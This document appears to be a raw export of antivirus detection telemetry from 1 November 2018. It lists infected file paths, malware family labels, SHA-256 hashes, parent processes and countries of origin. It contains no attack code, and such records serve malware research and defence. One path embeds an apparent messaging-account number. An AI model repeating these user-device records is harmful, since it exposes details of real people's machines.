  Row(detection=Row(filename='avscan-20181101-152226-51eb39ce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7a07b621\\AVSCAN-20181101-152136-48B4A2E2\\AVSCAN-20181101-152226-51EB39CE', filesize=896000, name='TR/Muldrop.phzie.#M1.#R1'), hash='18c3b3e51d6d955dba0de350125894462d0e2a9518358e9ee6d45e6ce8c419c0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T14:22:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='argent.exe', filepath='C:\\Program Files (x86)\\Shirl\\argent.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='054c0f8446a1a67cbb52839a10f2327ea80ac8320315d9de12d4e6677a8b902f', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\neutral\\competitively.exe', parentsize=49436, timestamp='2018-11-01T14:01:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='taskhost.vir', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\Adobe\\taskhost.VIR', filesize=768000, name='HEUR/AGEN.1000279.#M1.#R1'), hash='2d129e5e4d7ac70661f11b8bbdef83067f74e4f0963a9b1820431231913e7b6e', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:29:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a2cff514bdff1c3a9e1e98222d19a4fccf8cd7e90943fd09fd0789a2f4109255', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-34\\A2CFF514BDFF1C3A9E1E98222D19A4FCCF8CD7E90943FD09FD0789A2F4109255', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='a2cff514bdff1c3a9e1e98222d19a4fccf8cd7e90943fd09fd0789a2f4109255', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:54:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a834b4c48f7e57e704d0aa9f60025c4ece1f33b220eb347d4a57a2e81a34d3e1', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\A834B4C48F7E57E704D0AA9F60025C4ECE1F33B220EB347D4A57A2E81A34D3E1', filesize=1856000, name='HEUR/AGEN.1029502.#M1.#R1'), hash='a834b4c48f7e57e704d0aa9f60025c4ece1f33b220eb347d4a57a2e81a34d3e1', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:15:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='9efcb170c89b7575c13953719263eff6f74be1ffb30c6f047e917ec5793ccfc9', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\SoftwareUpdater\\AviraSoftwareUpdaterToastNotificationsBridge.exe', parentsize=103880, timestamp='2018-11-01T14:56:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110841-e95ec587', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110841-E95EC587', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:08:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ec95cf956b6ec8619eb7c891cb985dbd95ff6629fe72f1095cd20ca359c5250f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-17.available\\Avira\\EC95CF956B6EC8619EB7C891CB985DBD95FF6629FE72F1095CD20CA359C5250F', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='ec95cf956b6ec8619eb7c891cb985dbd95ff6629fe72f1095cd20ca359c5250f', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T09:21:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rdrleakdiag.exe', filepath='\\\\?\\C:\\Windows\\winsxs\\x86_microsoft-windows-r..eak-diagnostic-core_31bf3856ad364e35_6.1.7600.16385_none_5ae7f926deb5de01\\rdrleakdiag.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='695401b52e416577f5c69c153b5bed69d7c47cfcc62e8e3b450c505dac8ed047', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:26:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=19452000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='6a46ea1d7f1da34104b809c6cab68409fde9e42efd5e836e170f207812ddd47e', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T11:15:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cscript.exe', filepath='C:\\PROGRAM FILES\\OFFICE 2010 激活文件\\MINI-KMS 1.3\\cscript.exe', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='f061c0a99b876ca1154830083b9c8e8a10e4e88d027298175e50bbd12161d6b0', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:49sueK368k+zChEF.1', country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T00:47:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='c295276d613ba5bef8d92ef54311297939568d1ccbb8090577561363df774b15', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-32\\C295276D613BA5BEF8D92EF54311297939568D1CCBB8090577561363DF774B15', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601544'), hash='c295276d613ba5bef8d92ef54311297939568d1ccbb8090577561363df774b15', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:51:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ifversion.dll', filepath='C:\\Program Files (x86)\\AspenTech\\Aspen HYSYS V7.1\\IFVersion.dll', filesize=192000, name='W32/Ramnit.CD.#M1.#R1'), hash='6b41dc28bde442c5d161a7ddab28ca8f2b6fb75c507020de2926662ec11a21f1', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T22:37:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='c2059fc525c035ac4f3adb8f992ce1815d8e867d9cf52fd09bde4b49f4229aae', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-32\\C2059FC525C035AC4F3ADB8F992CE1815D8E867D9CF52FD09BDE4B49F4229AAE', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='c2059fc525c035ac4f3adb8f992ce1815d8e867d9cf52fd09bde4b49f4229aae', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T15:08:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Desktop\\NICE old\\bin_3rdparty\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:WXVXpfv+LkemExuC.1', country='NO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T03:10:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered tocol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered tocol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='c2c74d5724abbb8c4ce1b9b54093850b48820c8d39869f0434e8240d24009071', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:33:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142328-c2a7fc31', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ed5e65bd\\AVSCAN-20181101-141758-9212A372\\AVSCAN-20181101-142328-C2A7FC31', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:23:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bfffddfbddbbffdbdbfdddbfdbddbfbbddbbbfbffdbbbbddbddbf.bfffddfbddbbffdbdbfdddbfdbddbfbbddbbbfbffdbbbbddbddbf', filepath='G:\\\xa0\\data0\\data0\\data0\\data0\\data0\\data0\\data0\\data0\\data0\\bfffddfbddbbffdbdbfdddbfdbddbfbbddbbbfbffdbbbbddbddbf.bfffddfbddbbffdbdbfdddbfdbddbfbbddbbbfbffdbbbbddbddbf', filesize=5952000, name='WORM/Lodbak.Gen.#M2.#R7758'), hash='eae2ce948d7bcfc7a25cf45c3e4439425a1b245a0ed49da7bce1ece882291183', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T09:34:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cronet_media_cache.exe', filepath='G:\\Android\\data\\com.google.android.youtube\\cache\\cronet_media_cache.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='e9238eb4cc2a0e45a4ecca77c7477cc3a19b6954cc0ca545537f1325ece125fc', metadata=Row(cmdline=None, country='CI', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2106176, timestamp='2018-11-01T11:57:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151200-3fcd706f', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-151143-A14FC51B\\AVSCAN-20181101-151200-3FCD706F', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:11:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-225420-076298aa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_91b74da9\\AVSCAN-20181031-225153-F8CF7756\\AVSCAN-20181031-225420-076298AA', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T01:54:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111206-031e4a5e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111206-031E4A5E', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:11:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wmplayer.exe', filepath='D:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='544dde8c316c6602a65d70e5a767b16442ceb187595c91b4ebf191ae096abd45', metadata=Row(cmdline='\\\\\\/prefetch:1', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\Program Files\\Windows Media Player\\wmplayer.exe', parentsize=192000, timestamp='2018-11-01T22:20:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110710-ddca25e8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110710-DDCA25E8', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:06:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$r27bbfp.exe', filepath='C:\\$Recycle.Bin\\S-1-5-21-2192791235-2971643662-3870428667-1000\\$R27BBFP.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T02:46:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T05:36:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T13:40:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='reg.exe', filepath='H:\\WINDOWS\\$NtServicePackUninstall$\\reg.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='3c2207c73c92f5727f9d9ac71706119dfc6e720b0fa52deb4b6fdf8c49ccd459', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-01T10:26:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='old_quartz.dll', filepath='C:\\KMPlayer\\Old_QUARTZ.DLL', filesize=836000, name='W32/Ramnit.C.#M0.#R0'), hash='300b624aea698a4851d5908f4ebfa3d5eca0f1a7620d52adcc9d952db20afb25', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:23:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T14:57:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-224129-51077832', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1b08848b\\AVSCAN-20181101-224115-4EA08151\\AVSCAN-20181101-224129-51077832', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T21:41:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000af5bb', filepath='C:\\Windows\\Temp\\tmp00000296\\tmp000af5bb', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T10:51:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup_winthruster_2016_4.exe', filepath='C:\\Users\\X\\Downloads\\Programs\\Setup_WinThruster_2016_4.exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline='\\\\\\/onboot', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Download Manager\\IDMan.exe', parentsize=3911248, timestamp='2018-11-01T09:12:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T15:53:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup_winthruster_2016.exe', filepath='C:\\Users\\X\\Downloads\\Setup_WinThruster_2016.exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-01T04:09:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000af448', filepath='C:\\Windows\\Temp\\tmp00000296\\tmp000af448', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T10:51:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='价格咨询.tbz2', filepath='\\\\?\\D:\\@@@SANDY DATA (2017)\\D DATA\\20160527\\Documents\\Tencent Files\\1482779809\\FileRecv\\价格咨询.tbz2', filesize=10496000, name='HEUR/AGEN.1027012.#M1.#R1'), hash='0151d5c2e21b066cbe88b301dfe7b3cdbb24c14ef8b8da228b429d2a7b5d59fd', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:18:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-172605-d5133d71', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_357a596a\\AVSCAN-20181101-172500-D01F2DF7\\AVSCAN-20181101-172605-D5133D71', filesize=64000, name='HEUR/Macro.Downloader.AMCY.Gen.#M1.#R1'), hash='73e5347a1f749cfc99c19f79e18c6855c761f039841989a472b2f1b3aa196c2b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:26:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T12:28:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-003354-82bc1372', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-003354-82BC1372', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:34:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='updater_zip_res2017042888uu_new[1].exe', filepath='\\\\?\\C:\\Windows\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res2017042888uu_new[1].exe', filesize=576000, name='HEUR/AGEN.1030714.#M1.#R1'), hash='2d9bffb5b2cd0a3d0251d753856f11d6b3fc6a26eedd17c9bbbefe52eafce55b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:42:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e_s50st7.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{C6E639E3-12B6-4CA3-BE05-00E533F97068}\\E_S50ST7.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='03bb807416637190950ce5e22b75847cdb92bb46d52eefe66bdcc5e34261f60e', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T01:01:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002835-3a637a1f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_83a270a8\\AVSCAN-20181101-235245-023F16A9\\AVSCAN-20181102-002835-3A637A1F', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:28:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00001b13', filepath='C:\\Windows\\Temp\\tmp00000308\\tmp00001b13', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T13:40:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='memory10.exe', filepath='c:\\program files (x86)\\school@net\\vui hoc tieng viet\\luyen tri nho 10\\memory10.exe', filesize=3840000, name='HEUR/APC.Griffin.#M1.#R1'), hash='819ced6c2cbc5fbd4f91e5147b0753b8b98fcd55ce0fd31556ab04f14a9191a2', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\is-GKS84.tmp\\setup_Luyen tri nho 10.tmp', parentsize=1182720, timestamp='2018-11-01T15:07:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mdac_typ.exe', filepath='\\\\?\\C:\\Users\\X\\Desktop\\Virtual Share\\SolidWorks 2010\\swwi\\data\\temp\\~MDAC270\\Polish\\mdac_typ.exe', filesize=5488000, name='W32/Sality.AT.#M1.#R1'), hash='375e50013b412a4f361203925789431883f97b37d8b7e21124a41ab7aa26ba7f', metadata=Row(cmdline=None, country='BA', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T19:48:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='TT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-01T18:14:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='6a4cd07fa42811b2bda9b913ca8cf6a120f39882060facd30efd2a1af383a881', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-25.categorizing\\6A4CD07FA42811B2BDA9B913CA8CF6A120F39882060FACD30EFD2A1AF383A881', filesize=1856000, name='HEUR/AGEN.1029502.#M1.#R1'), hash='6a4cd07fa42811b2bda9b913ca8cf6a120f39882060facd30efd2a1af383a881', metadata=Row(cmdline='-r', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T12:08:30Z'), dt=datetime.date(2018, 11, 1)),
